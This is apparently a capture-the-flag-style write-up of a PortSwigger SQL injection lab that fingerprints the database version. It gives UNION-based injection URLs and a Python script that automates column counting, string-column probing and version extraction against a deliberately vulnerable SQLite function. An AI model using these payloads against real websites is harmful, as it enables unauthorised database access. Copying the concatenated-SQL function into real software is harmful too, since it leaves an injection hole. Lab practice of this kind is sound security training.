
πŸ•ΈοΈ PSA - SQLi 8 - Querying DB type and version on MySQL and Microsoft

Difficulty : Practitioner

🎯 Goal

To solve the lab, display the database version string.

βœ… Solution

We know the back end is either MySQL or Microsoft SQL Server, so we have to try the comment syntax of each to terminate the injected query: `--comment` works on Microsoft SQL Server, while MySQL requires either `#comment` or `-- comment` (the space after the double dash is mandatory in MySQL). In the URL, `#` must be encoded as `%23` and the trailing space as `%20`, otherwise the browser treats `#` as a fragment and drops the space.

Find the number of columns while trying different comments:

```
# Microsoft: --comment
<website>/filter?category=Gifts'UNION SELECT NULL--                 # error!
<website>/filter?category=Gifts'UNION SELECT NULL,NULL--            # error!
<website>/filter?category=Gifts'UNION SELECT NULL,NULL,NULL--       # error!
# MySQL: #comment
<website>/filter?category=Gifts'UNION SELECT NULL%23                # error!
<website>/filter?category=Gifts'UNION SELECT NULL,NULL%23           # works
<website>/filter?category=Gifts'UNION SELECT NULL,NULL,NULL%23      # error!
# MySQL: -- comment
<website>/filter?category=Gifts'UNION SELECT NULL--%20              # error!
<website>/filter?category=Gifts'UNION SELECT NULL,NULL--%20         # works
<website>/filter?category=Gifts'UNION SELECT NULL,NULL,NULL--%20    # error!
```

The `--` payloads all fail while both MySQL comment styles succeed with two `NULL`s, so the query returns 2 columns and the back end is MySQL. Next, check whether one of the columns accepts a string:

```
<website>/filter?category=Gifts'UNION SELECT 'abc',NULL--%20        # works
```

To retrieve the database type and version we query `@@version`, which both MySQL and Microsoft SQL Server expose, and place it in the first (string) column. The `@` character is `%40` when URL encoded.

Full payload:

```
<website>/filter?category=Gifts'+UNION+SELECT+%40%40version,NULL--%20    # works
```

The database type and version are displayed.
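The three steps above (count the columns, find a string column, UNION the version string into it) are the same for any UNION-based injection, so here is an added example that automates them. This is not the lab's code or PortSwigger's: it builds the URL-encoded probes for all three comment styles, then runs the same search against a constructed, deliberately vulnerable SQLite stand-in (the lab itself is MySQL; SQLite is used only so the example runs offline, with `sqlite_version()` standing in for `@@version`). The base URL, table and rows are assumptions.

```python
import sqlite3
from urllib.parse import quote

# Comment sequences from the write-up, one per back end. The `#` form and the
# `-- ` form (trailing space mandatory) are MySQL; bare `--` is Microsoft SQL Server.
COMMENT_STYLES = {"mssql": "--", "mysql_hash": "#", "mysql_dash": "-- "}


def payload_url(base: str, payload: str) -> str:
    """URL-encode an injection so that #, @ and spaces survive the query string."""
    return f"{base}/filter?category={quote(payload, safe='')}"


def column_count_payloads(comment: str, max_cols: int = 10):
    """Yield (n, payload) pairs: UNION SELECT NULL,... with 1..max_cols columns."""
    for n in range(1, max_cols + 1):
        yield n, "Gifts' UNION SELECT " + ",".join(["NULL"] * n) + comment


# Constructed stand-in for the lab back end (assumption: the real lab is MySQL;
# SQLite is used here so the example runs offline). Two columns come back, as in the lab.
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE products (name TEXT, category TEXT, price INTEGER);
    INSERT INTO products VALUES ('Mug', 'Gifts', 12), ('Pen', 'Gifts', 3);
""")


def filter_products(category: str) -> list:
    """Deliberately vulnerable: user input is concatenated straight into the SQL."""
    sql = f"SELECT name, price FROM products WHERE category = '{category}'"
    return _db.execute(sql).fetchall()


def page_renders(category: str) -> bool:
    """Oracle standing in for 'HTTP 200' vs 'HTTP 500' on the lab."""
    try:
        filter_products(category)
        return True
    except sqlite3.Error:
        return False


def find_column_count(comment: str = "-- ", max_cols: int = 10):
    """Step 1: the first NULL,NULL,... payload that does not error gives the count."""
    for n, payload in column_count_payloads(comment, max_cols):
        if page_renders(payload):
            return n
    return None


def find_string_column(ncols: int, comment: str = "-- "):
    """Step 2: put 'abc' in each position in turn; the first that renders is usable."""
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = "'abc'"
        if page_renders("Gifts' UNION SELECT " + ",".join(cols) + comment):
            return i
    return None


def extract(expr: str, ncols: int, col: int, comment: str = "-- ") -> str:
    """Step 3: UNION the expression into the string column; NULLs elsewhere mark our row."""
    cols = ["NULL"] * ncols
    cols[col] = expr
    rows = filter_products("Gifts' UNION SELECT " + ",".join(cols) + comment)
    for row in rows:
        if all(v is None for j, v in enumerate(row) if j != col):
            return row[col]
    raise RuntimeError("injected row not found")


if __name__ == "__main__":
    # The URLs you would paste into the browser for each comment style.
    for name, c in COMMENT_STYLES.items():
        print(name, payload_url("https://<website>", "Gifts' UNION SELECT @@version,NULL" + c))
    # The same three steps run against the SQLite stand-in.
    n = find_column_count()
    col = find_string_column(n)
    print("columns:", n, "string column:", col, "version:", extract("sqlite_version()", n, col))
```

Only the `-- ` style succeeds against the SQLite stand-in, since SQLite does not understand `#`; on the lab the oracle is the HTTP status (500 on a malformed UNION, 200 otherwise), so `page_renders` would wrap a request rather than a local query. Note that `find_string_column` passes on SQLite and MySQL because both coerce types loosely, whereas Microsoft SQL Server would reject `'abc'` in an integer column, which is exactly why that probe is needed.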

This post is licensed under GNU GPLv3 by the author.